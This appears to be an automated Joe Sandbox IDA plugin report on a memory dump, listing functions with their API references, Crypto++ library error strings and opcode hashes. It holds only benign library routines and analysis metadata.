Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
String ID: PK_MessageAccumulator: DigestSize() should not be called$PK_MessageAccumulator: TruncatedFinal() should not be called
API String ID: 1902190269-1268710280
Opcode ID: f96a1ec2c9597d9fd9c7efb8e358966cbe0213a1d46ef035ade0ae52e4064913
Instruction ID: 8fd4e77756da215865a304ec1f5560cf80f54103bf337c6bfd038049e9622008
Opcode Fuzzy Hash: f96a1ec2c9597d9fd9c7efb8e358966cbe0213a1d46ef035ade0ae52e4064913
Instruction Fuzzy Hash: 364130B0C0428CAFDB11DFD9D890BDDFBB8AB19314F50465EE421A7B90DB745608CB50

Function 6CE91D30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A

__CxxThrowException@8.LIBCMT ref: 6CE91DC9

Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7

Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE94067
Part of subcall function 6CE94010: _memmove.LIBCMT ref: 6CE940C8

__CxxThrowException@8.LIBCMT ref: 6CE91E74

Strings

CryptoMaterial: this object contains invalid values, xrefs: 6CE91E16
BufferedTransformation: this object is not attachable, xrefs: 6CE91D67

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
String ID: BufferedTransformation: this object is not attachable$CryptoMaterial: this object contains invalid values
API String ID: 1902190269-3853263434
Opcode ID: 9c5687a28977adc4caeb739e043d170fba3659d4d02a1070a514151c87e1fef7
Instruction ID: f71c34d6d95e5fcffca8d78285ed9fe7f37c47c0ae5e753e923af0b003ad9f5f
Opcode Fuzzy Hash: 9c5687a28977adc4caeb739e043d170fba3659d4d02a1070a514151c87e1fef7
Instruction Fuzzy Hash: F7412EB1C04288AFCB15DFE9D890BDDFBB8EB19314F10865EE42567B90DB355A08CB50

Function 6CEC74C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 6CEED820: _memmove.LIBCMT ref: 6CEED930

Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A

__CxxThrowException@8.LIBCMT ref: 6CEC761A

Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7

Strings

HashTransformation: can't truncate a , xrefs: 6CEC7552
byte digest to , xrefs: 6CEC7565
bytes, xrefs: 6CEC7594

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
String ID: byte digest to $ bytes$HashTransformation: can't truncate a
API String ID: 39012651-1139078987
Opcode ID: 1313641461df772cca8b3939f25ed916a0d260753f221796dc4d8050abb8cb14
Instruction ID: 0b23b748645566e733e94215ded2364d22c724ad2fc4863114d0f08c9e65fe04
Opcode Fuzzy Hash: 1313641461df772cca8b3939f25ed916a0d260753f221796dc4d8050abb8cb14
Instruction Fuzzy Hash: 08414E7110C3C0ABD330CB54C845FDBBBE8ABD9718F104A1EE59997B80EB7595088BA7

Function 6CECBEF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CECBF2D

Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113

Strings

vector<T> too long, xrefs: 6CECBF28
gfff, xrefs: 6CECBF37
gfff, xrefs: 6CECBF80

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: gfff$gfff$vector<T> too long
API String ID: 1823113695-3369487235
Opcode ID: 1df9644865a5f09d83804182d30d291701bafb4aa213ff802c732c81255d51f5
Instruction ID: f1f151aa08615d41d879e265c01c855317ab75a8bf31f3fcfa7f59fb2647cc1e
Opcode Fuzzy Hash: 1df9644865a5f09d83804182d30d291701bafb4aa213ff802c732c81255d51f5
Instruction Fuzzy Hash: 5431C8B1A046499FC718CF59DD80E6AF7B9FB48304F14862DE9699B780D731B904CB91

Function 6CEF8E40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32(67D4BDE6,67D4BDE6), ref: 6CEF8E7F
GetLastError.KERNEL32(0000000A), ref: 6CEF8E8F

Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A

__CxxThrowException@8.LIBCMT ref: 6CEF8F14

Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7

Strings

Timer: QueryPerformanceFrequency failed with error , xrefs: 6CEF8EA5

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: ErrorExceptionException@8FrequencyLastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
String ID: Timer: QueryPerformanceFrequency failed with error
API String ID: 2175244869-348333943
Opcode ID: 3d72feb9989a6e01a849d959e202837a434e1db1958e9deb15941dcf4202caf5
Instruction ID: 2089329366c0e3ee457ce2be6058622c6ef4c10450ad10e9c57d1f1a76cdd4f8
Opcode Fuzzy Hash: 3d72feb9989a6e01a849d959e202837a434e1db1958e9deb15941dcf4202caf5
Instruction Fuzzy Hash: B2211DB150C380AFD310CF24C841B9BBBF8BB89658F504A1EF5A986741D77595088BA3

Function 6CEF8F40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(67D4BDE6,67D4BDE6,?,00000000), ref: 6CEF8F7F
GetLastError.KERNEL32(0000000A,?,00000000), ref: 6CEF8F8F

Part of subcall function 6CE94010: std::_Xinvalid_argument.LIBCPMT ref: 6CE9402A

__CxxThrowException@8.LIBCMT ref: 6CEF9014

Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7

Strings

Timer: QueryPerformanceCounter failed with error , xrefs: 6CEF8FA5

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: CounterErrorExceptionException@8LastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
String ID: Timer: QueryPerformanceCounter failed with error
API String ID: 1823523280-4075696077
Opcode ID: 7baa797cdf9e75a80129f3801fb5b56eaf2893005c08910f0bec07e2c1eb7510
Instruction ID: 89e76c629914e1cdbd1570923ae5214dec5ae6c91a98a16f66ea3994e11dca38
Opcode Fuzzy Hash: 7baa797cdf9e75a80129f3801fb5b56eaf2893005c08910f0bec07e2c1eb7510
Instruction Fuzzy Hash: AB211DB150C380AFD310CF24C881B9BBBF8BB89658F504A1EF5A986781D77595088BA3

Function 6CEC6480 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CEC6518

Part of subcall function 6CEFAC75: RaiseException.KERNEL32(?,?,6CEF9C34,67D4BDE6,?,?,?,?,6CEF9C34,67D4BDE6,6CF29C90,6CF3B974,67D4BDE6), ref: 6CEFACB7

__CxxThrowException@8.LIBCMT ref: 6CEC6558

Strings

Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 6CEC64E7
Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 6CEC6527

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
API String ID: 3476068407-3345525433
Opcode ID: 45b7673affa84556a4e790325471c40e9f2b5ea1c30ae1f278c3aa6f6cf6da6a
Instruction ID: f1ae63128e156636ad4f5ee42a3d01d10c8eb6012dcd7b3e3a8312bc9010b5e9
Opcode Fuzzy Hash: 45b7673affa84556a4e790325471c40e9f2b5ea1c30ae1f278c3aa6f6cf6da6a
Instruction Fuzzy Hash: 4821C3716183809EDB24CF64C940BEBB3F8BB4960CF704E1DE5A982B40EB3594098A63

Function 6CECC120 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CECC14E

Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113

Strings

gfff, xrefs: 6CECC15A
vector<T> too long, xrefs: 6CECC149
gfff, xrefs: 6CECC129

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: gfff$gfff$vector<T> too long
API String ID: 1823113695-3369487235
Opcode ID: 51df42c48983fb6291f24bbf4f5bf37269e5cf44ac4f43750597624862dd576a
Instruction ID: 56f11645b301424ffc9a8e68e20a247d1c222dab5916158cf2bdef20ef5abfa2
Opcode Fuzzy Hash: 51df42c48983fb6291f24bbf4f5bf37269e5cf44ac4f43750597624862dd576a
Instruction Fuzzy Hash: AF01AD73F140291F8310997FEE4044AEAABABC4794329CA3AE618DBB48E531D80242C3

Function 6CEA5160 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CEA5173

Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF90ED
Part of subcall function 6CEF90D8: __CxxThrowException@8.LIBCMT ref: 6CEF9102
Part of subcall function 6CEF90D8: std::exception::exception.LIBCMT ref: 6CEF9113

_memmove.LIBCMT ref: 6CEA519E

Strings

vector<T> too long, xrefs: 6CEA516E
n/l, xrefs: 6CEA5163, 6CEA51BD

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: n/l$vector<T> too long
API String ID: 1785806476-2200402934
Opcode ID: cf23b472ba2cc00e82b1ee95f14c4aed9074e1017453043bd7b471e376c4caeb
Instruction ID: 92e2b0a84d2e90f869c279dc4579b94c1c0f18e2f9cbfacdc4010d0c31915abb
Opcode Fuzzy Hash: cf23b472ba2cc00e82b1ee95f14c4aed9074e1017453043bd7b471e376c4caeb
Instruction Fuzzy Hash: 6E0184B26016059FD728CEA8CC91C7AB3E8EB54208724492DE89AC7B40E731F805CB61

Function 6CED25D0 Relevance: 6.2, APIs: 4, Instructions: 206COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6CED2677
_memmove.LIBCMT ref: 6CED26E6
_memmove.LIBCMT ref: 6CED2746
__CxxThrowException@8.LIBCMT ref: 6CED27CD

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: _memmove$Exception@8Throw
String ID:
API String ID: 2655171816-0
Opcode ID: bb36e23abefa48a25c55c2add23a1015cdda4adfcd14f561715116e8ea545435
Instruction ID: 0fb90faef0879518e593b0a8eb688ce1cb6711c2467b3124359ac2835a2ddf08
Opcode Fuzzy Hash: bb36e23abefa48a25c55c2add23a1015cdda4adfcd14f561715116e8ea545435
Instruction Fuzzy Hash: E15170757047058FD714DF68C994A1EB3F9AF98608F21492DF8A5C3B40EB34ED0A8B92

Function 6CEAD4B0 Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF

std::exception::exception.LIBCMT ref: 6CEAD5E4
__CxxThrowException@8.LIBCMT ref: 6CEAD5F9
std::exception::exception.LIBCMT ref: 6CEAD608
__CxxThrowException@8.LIBCMT ref: 6CEAD61D

Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C04
Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C1E
Part of subcall function 6CEF9BB5: __CxxThrowException@8.LIBCMT ref: 6CEF9C2F

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID:
API String ID: 2621100827-0
Opcode ID: a53a793bdc2a47b8650c23b4a1ca96a204c458a934ecd69867ee95156e37b15a
Instruction ID: 8235bd13bec684fcd0e6c181ffe5daa555d37020536d3b3132f5e455cc930f1e
Opcode Fuzzy Hash: a53a793bdc2a47b8650c23b4a1ca96a204c458a934ecd69867ee95156e37b15a
Instruction Fuzzy Hash: 2F514DB5A00649AFC704CFA8C980A99BBF4FB08304F60866DD4199BB41D775EA55CBA1

Function 6CEB5F00 Relevance: 6.1, APIs: 4, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 6CEF9BB5: _malloc.LIBCMT ref: 6CEF9BCF

std::exception::exception.LIBCMT ref: 6CEB6035
__CxxThrowException@8.LIBCMT ref: 6CEB604A
std::exception::exception.LIBCMT ref: 6CEB6059
__CxxThrowException@8.LIBCMT ref: 6CEB606E

Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C04
Part of subcall function 6CEF9BB5: std::exception::exception.LIBCMT ref: 6CEF9C1E
Part of subcall function 6CEF9BB5: __CxxThrowException@8.LIBCMT ref: 6CEF9C2F

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID:
API String ID: 2621100827-0
Opcode ID: 8046240dd35049833997ce47d500b0ab9f08d8103ebd8643668ba9a20a7bf749
Instruction ID: fe7564a6d912316bd8d002a0f571063ec3dce1c7126330c6f74fb6ab390522fd
Opcode Fuzzy Hash: 8046240dd35049833997ce47d500b0ab9f08d8103ebd8643668ba9a20a7bf749
Instruction Fuzzy Hash: 44515CB1A05649AFC704CFA8C980A99FBF4FF08304F60866EE419D7B41D775E954CBA1

Function 6CEADE50 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CEADE81
VariantClear.OLEAUT32(?), ref: 6CEADF3C
VariantClear.OLEAUT32(?), ref: 6CEADF6D
VariantClear.OLEAUT32(?), ref: 6CEADF8B

Memory Dump Source

Source File: 00000000.00000002.2014389584.000000006CE91000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE90000, based on PE: true

Associated: 00000000.00000002.2014355219.000000006CE90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015091241.000000006CF14000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015274112.000000006CF2E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015341229.000000006CF30000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015362293.000000006CF31000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015386804.000000006CF33000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015466963.000000006CF3C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2015547045.000000006CF3E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce90000_SecuriteInfo.jbxd

Similarity

API ID: Variant$Clear$Init
String ID:
API String ID: 3740757921-0
Opcode ID: 1e098109b1fc8944f34012f8cbb4915184b878268acd70d5046bcf0b40e69a37
Instruction ID: 40038627af5dba9962a21c9555b04aaa2b26de421294a368eb0d7edb8df03f1f
